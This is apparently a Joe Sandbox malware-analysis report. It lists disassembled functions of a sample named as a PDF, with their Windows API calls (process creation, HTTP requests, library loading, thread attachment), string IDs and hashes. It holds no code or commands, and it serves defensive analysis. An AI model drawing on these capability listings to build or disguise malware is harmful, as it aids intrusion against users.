                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                                    • Instruction ID: fd8f8805d5e24b2d851a2dd86bf47f5fa601558f7d89966d576ea6a0ef310e29
                                                    • Opcode Fuzzy Hash: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                                    • Instruction Fuzzy Hash: 505102712047019BD717AF28C841BABBBE8AF86350F1506AAF896D71E0DBB0DD448B52
                                                    Function 00380213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003802B1
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003802C2
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00380344
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                                    • Instruction ID: 9ffe86564346fb34d576bd6a506658055ee4a4f7eec926631ce95dbc043f3fad
                                                    • Opcode Fuzzy Hash: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                                    • Instruction Fuzzy Hash: D8413C75600304EFDB8ADF64C885B9A7BA9EF44310B1580ADA909DF206D7F1DA48CBA0
                                                    Function 00385007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00385075
                                                    • GetMenuItemInfoW.USER32 ref: 00385091
                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003850D7
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401708,00000000), ref: 00385120
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                                    • Instruction ID: e94c8239dffc1bd2a3f2db5d14e32a9caa4ee41ad6e16f37d4dba5f370ec688d
                                                    • Opcode Fuzzy Hash: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                                    • Instruction Fuzzy Hash: C241F571204701AFDB22EF24DC84F2ABBE9AF85314F04469EF8559B391D730E904CB62
                                                    Function 003A0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 003A0587
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 2358735015-567219261
                                                    • Opcode ID: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                                    • Instruction ID: 66922b11276190e711b0bcd1b731ccf5836ed2d060b89ee14986d8719a9ed267
                                                    • Opcode Fuzzy Hash: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                                    • Instruction Fuzzy Hash: E531923091021AAFCF06EF54C8419EEB3B4FF56314B104629E866AB6E1DB71E915CB80
                                                    Function 0037B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0037B88E
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0037B8A1
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0037B8D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3850602802-1403004172
                                                    • Opcode ID: b70d8bd7858baa964c55c812d16e4a6634ea0a5d1f2854c32d56afc6489c87d7
                                                    • Instruction ID: 1685acd96d17723b135c38fd7fd72acc1a4291d3988349c0d73db05213e92761
                                                    • Opcode Fuzzy Hash: b70d8bd7858baa964c55c812d16e4a6634ea0a5d1f2854c32d56afc6489c87d7
                                                    • Instruction Fuzzy Hash: F521F671900108BFDB269B64D886EFEB7BCDF06350F108129F565AB1E0DB785D0A9760
                                                    Function 003451AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0034522F
                                                    • _wcscpy.LIBCMT ref: 00345283
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00345293
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003B3CB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 1053898822-1585850449
                                                    • Opcode ID: 6515272eced91e188436b917eb856cd404aecf9bcd9b44eb436f7e224018e9c2
                                                    • Instruction ID: 4ce7a2ffc5b10728cf9f00f109d9a9511545c1d086971db48a7ec0670739cd50
                                                    • Opcode Fuzzy Hash: 6515272eced91e188436b917eb856cd404aecf9bcd9b44eb436f7e224018e9c2
                                                    • Instruction Fuzzy Hash: 7F31A1718087446FD726EB60DC42FDE77DCAB45310F00492EF5859E4A2EB74B648CB96
                                                    Function 003943E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00394427
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00394457
                                                    • InternetCloseHandle.WININET(00000000), ref: 0039449E
                                                      • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 1951874230-3916222277
                                                    • Opcode ID: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                                    • Instruction ID: 56628d566580987b3286291d56a1ddea5114e0dabbf85f5ca49c438e74d8545a
                                                    • Opcode Fuzzy Hash: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                                    • Instruction Fuzzy Hash: E6219FB2500208BFEB139F55CC85EBFB6FCEB48B48F11802AF509E6240EA749D069771
                                                    Function 003A90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                      • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                      • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003A915C
                                                    • LoadLibraryW.KERNEL32(?), ref: 003A9163
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003A9178
                                                    • DestroyWindow.USER32(?), ref: 003A9180
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                                    • Instruction ID: c36df3370eec123d1add2d2f1523054229c21b743e25463236ef8793aca35a8a
                                                    • Opcode Fuzzy Hash: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                                    • Instruction Fuzzy Hash: AA21A171200206BBEF224F64DC84FBB37ADEF9A364F11462AF954E6190C735DC52A760
                                                    Function 00389568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00389588
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003895B9
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 003895CB
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00389605
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                                    • Instruction ID: 3810732b695f9c1af9bbca2ae109d9c6f4500277782ab3c387fede9884c2104e
                                                    • Opcode Fuzzy Hash: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                                    • Instruction Fuzzy Hash: 1C215170600305ABDB22AF65DC05FAE77E8AF46724F244A6AF9A1D72D0D770E944CB10
                                                    Function 00389634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00389653
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00389683
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00389694
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003896CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                                    • Instruction ID: 60905a4f2a1b963e4bb784ddee4f7790b56d9c9ebbf04ade834b8298cf796abf
                                                    • Opcode Fuzzy Hash: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                                    • Instruction Fuzzy Hash: 562183716003059BDB22AF699C45FAAB7ECAF45730F280A5AF8A1E72D0F770D841CB50
                                                    Function 0038DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038DB0A
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0038DB5E
                                                    • __swprintf.LIBCMT ref: 0038DB77
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,003DDC00), ref: 0038DBB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                                    • Instruction ID: 36b5f9bd0677c5deaaac1661082ce4194540701130894f65273e3e4aab91f4a8
                                                    • Opcode Fuzzy Hash: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                                    • Instruction Fuzzy Hash: 5C215335A00208AFCB12EF65D985DEEBBF8EF49704B1440A9F509DB251DB71EA41CB61
                                                    Function 0037C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                                      • Part of subcall function 0037C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                                      • Part of subcall function 0037C82D: GetCurrentThreadId.KERNEL32 ref: 0037C864
                                                      • Part of subcall function 0037C82D: AttachThreadInput.USER32(00000000), ref: 0037C86B
                                                    • GetFocus.USER32 ref: 0037CA05
                                                      • Part of subcall function 0037C876: GetParent.USER32(?), ref: 0037C884
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037CA4E
                                                    • EnumChildWindows.USER32(?,0037CAC4), ref: 0037CA76
                                                    • __swprintf.LIBCMT ref: 0037CA90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                    • String ID: %s%d
                                                    • API String ID: 3187004680-1110647743
                                                    • Opcode ID: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                                    • Instruction ID: da71f5ecd25b613e6ec3d3d06ec88c97ce869ce89ebf99ac9adfb291cf325d7b
                                                    • Opcode Fuzzy Hash: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                                    • Instruction Fuzzy Hash: D31175715102057BCB23BF509C86FE9376C9F45714F00906AFE0CAE142DB74A546DB71
                                                    Function 00367A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock.LIBCMT ref: 00367AD8
                                                      • Part of subcall function 00367CF4: __mtinitlocknum.LIBCMT ref: 00367D06
                                                      • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                                    • InterlockedIncrement.KERNEL32(?), ref: 00367AE5
                                                    • __lock.LIBCMT ref: 00367AF9
                                                    • ___addlocaleref.LIBCMT ref: 00367B17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                    • String ID: `<
                                                    • API String ID: 1687444384-1628095585
                                                    • Opcode ID: bc33b17cbc76c216fca52d1e47cd229c43566e93352fecc352b2cee4a8d74471
                                                    • Instruction ID: 35b0648f8ac70e86bae34e7e1b055a137377ac70fb3770fb0495bf380a20c8e2
                                                    • Opcode Fuzzy Hash: bc33b17cbc76c216fca52d1e47cd229c43566e93352fecc352b2cee4a8d74471
                                                    • Instruction Fuzzy Hash: 2C0180B5404B00DFD722DF75C90674ABBF0EF44325F20890EE49ADB6A4CBB4A680CB55
                                                    Function 003AE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003AE33D
                                                    • _memset.LIBCMT ref: 003AE34C
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403D00,00403D44), ref: 003AE37B
                                                    • CloseHandle.KERNEL32 ref: 003AE38D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID: D=@
                                                    • API String ID: 3277943733-2498164000
                                                    • Opcode ID: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                                    • Instruction ID: 6c2415e168798f743fdf974b35c1da473c374d4f09a77271ad8e553ea71991ac
                                                    • Opcode Fuzzy Hash: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                                    • Instruction Fuzzy Hash: 3BF05EF1540314BBE2125F61AC46F777E5CDF04755F008431BE08EA1A2D375AE0087AC
                                                    Function 003A1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003A19F3
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003A1A26
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003A1B49
                                                    • CloseHandle.KERNEL32(?), ref: 003A1BBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                                    • Instruction ID: e0e468090f8d72538a3550f6423969b761733dcd7632f9165b0b91f58d7a2e46
                                                    • Opcode Fuzzy Hash: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                                    • Instruction Fuzzy Hash: 3A816270600214ABDF12AF64C886FAEBBF5EF49720F148459F905AF3D2D7B4A945CB90
                                                    Function 00381C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00381CB4
                                                    • VariantClear.OLEAUT32(00000013), ref: 00381D26
                                                    • VariantClear.OLEAUT32(00000000), ref: 00381D81
                                                    • VariantClear.OLEAUT32(?), ref: 00381DF8
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00381E26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
